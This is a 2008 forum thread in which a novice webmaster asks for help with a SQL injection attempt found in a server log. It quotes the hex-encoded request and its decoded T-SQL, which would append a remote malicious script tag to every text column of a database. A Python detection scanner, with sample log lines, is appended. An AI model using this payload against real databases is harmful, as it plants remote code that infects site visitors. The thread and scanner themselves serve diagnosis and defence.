WebmasterWorld: New To Web Development Forum

SQL injection attempt (php/MySQL) help
Advice needed for cleaning up hacked website

5+ Year Member

Msg#: 3719893 posted 6:54 pm on Aug 10, 2008 (gmt 0)

I have a couple of very simple javascript polls on my site that use MySQL databases to count votes after the user selects an option using a radio button. Today, in our log, I noticed the following, which after researching, seems to be a SQL injection attempt similar to what has been going on lately:

"GET /?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST
72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 6338 "-"

(note: I inserted page breaks so the code wouldn't stretch the page)

I translated it to this:

DECLARE @T varchar(255),@C varchar(4000)
DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://sdo.1000mg.cn/csrss/w.js"></script><!--'' where '+@C+' not like ''%"></title><script src="http://www.example.com/csrss/w.js"></script><!--''')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor

I know nothing about php/MySQL other than what I've learned to get the polls working. I used the phpMyAdmin section my webhost provides to check the table structures in the database, and didn't find anything different. Clicking the polls brings up the results just like they should, with no redirects or any other apparent problem.

The SQL is:

SELECT * FROM `revolvepoll_results` WHERE 1

with two fields (candidate and num_votes).

I am wondering if someone can clarify for me whether there is anything else I need to do? I read through the thread in the Databases section but the discussion is too sophisticated for a novice like me.

Thank you for any help you can give.

BTW, I've lurked here a while but forgot the screen name I used to sign up, thus the new sign-up date.

[edited by: mack at 10:29 pm (utc) on Aug. 10, 2008]
[edit reason] removed site url from code just to be safe [/edit]



rocknbil (WebmasterWorld Senior Member, Top Contributor of All Time, 10+ Year Member)

Msg#: 3719893 posted 10:22 pm on Aug 10, 2008 (gmt 0)

Welcome aboard Norksie, have you seen this thread [webmasterworld.com]? Well discussed there.


5+ Year Member

Msg#: 3719893 posted 10:58 pm on Aug 10, 2008 (gmt 0)

Yes, thank you rocknbil, I did read that thread before I posted in this forum, but as I said, it is too sophisticated for my understanding. The responses presume a level of knowledge I don't have, which is why I came to this "newbie" forum hoping for some simplified advice.

Perhaps I can boil down my questions to the fundamentals:

1) If I was able to execute my poll javascript from the webpage where it is located, and nothing happened except the poll results output page was generated, can I be sure the attack failed?

2) If I look at the structure of my table with phpMyAdmin, and it shows nothing more than what I set up, can I be sure nothing was inserted into the table? In other words, would it be obvious if something was there?

I am not a programmer, only a casual webmaster, and I just want to be sure my visitors don't end up with something malicious. Thank you again to anyone who has any input.
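As an added example (not code from any poster in this thread), a small Python scanner for the kind of access-log line quoted in the first post: it URL-decodes the request, recognises the DECLARE ... CAST(0x...) ... EXEC(@S) pattern, turns the hex back into readable text, flags objects such as sysobjects and @@FETCH_STATUS that exist only in Microsoft SQL Server (so the script could not run against MySQL), and pulls out any script URL the payload would have written into table columns, which is the string to search a database for. The log lines and the shortened hex payload are constructed for this example; the regular expressions and marker list are assumptions.

```python
import re
from urllib.parse import unquote

# Signature of the hex-encoded T-SQL smuggled through CAST(0x... AS CHAR)
# and run with EXEC(@S), as in the access-log line quoted in the first post.
DECLARE_EXEC = re.compile(r"DECLARE\s+@\w+\s+N?(?:VAR)?CHAR\(\d+\).*EXEC\(@\w+\)",
                          re.IGNORECASE | re.DOTALL)
HEX_CAST = re.compile(r"CAST\(0x([0-9A-Fa-f]+)\s+AS\s+N?(?:VAR)?CHAR\(\d+\)\)", re.IGNORECASE)
SCRIPT_SRC = re.compile(r'<script\s+src="([^"]+)"', re.IGNORECASE)
# Objects that exist only in Microsoft SQL Server, not in MySQL (assumed marker list).
MSSQL_MARKERS = ("sysobjects", "syscolumns", "@@fetch_status")

def decode_hex_payload(hexstr):
    """Turn the 0x... blob back into text (NVARCHAR variants are UTF-16LE)."""
    raw = bytes.fromhex(hexstr)
    if raw and len(raw) % 2 == 0 and all(b == 0 for b in raw[1::2]):
        return raw.decode("utf-16-le")
    return raw.decode("latin-1")

def analyse_request(log_line):
    """Return None for a benign line, else a summary of what the attempt tried."""
    request = unquote(log_line)          # %20 and friends back to plain characters
    if not DECLARE_EXEC.search(request):
        return None
    m = HEX_CAST.search(request)
    payload = decode_hex_payload(m.group(1)) if m else ""
    lowered = payload.lower()
    return {
        "targets_mssql": any(k in lowered for k in MSSQL_MARKERS),
        "injected_urls": SCRIPT_SRC.findall(payload),   # strings to grep the DB for
        "payload": payload,
    }

# Constructed sample: a shortened version of the script decoded in the thread,
# hex-encoded the way the real requests carried it, plus one normal poll hit.
PAYLOAD = ("DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR "
           "select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id "
           "WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+"
           "''\"></title><script src=\"http://www.example.com/csrss/w.js\"></script><!--''') END")
SAMPLE_LOG = [
    '203.0.113.9 - - [10/Aug/2008:18:54:00 +0000] "GET /?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x'
    + PAYLOAD.encode().hex().upper() + '%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 6338 "-"',
    '203.0.113.9 - - [10/Aug/2008:18:55:00 +0000] "GET /poll.php?candidate=2 HTTP/1.1" 200 512 "-"',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(analyse_request(line))
```

Run it over a real access log one line at a time; a result with injected_urls tells you which literal string to search every text column for in phpMyAdmin.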
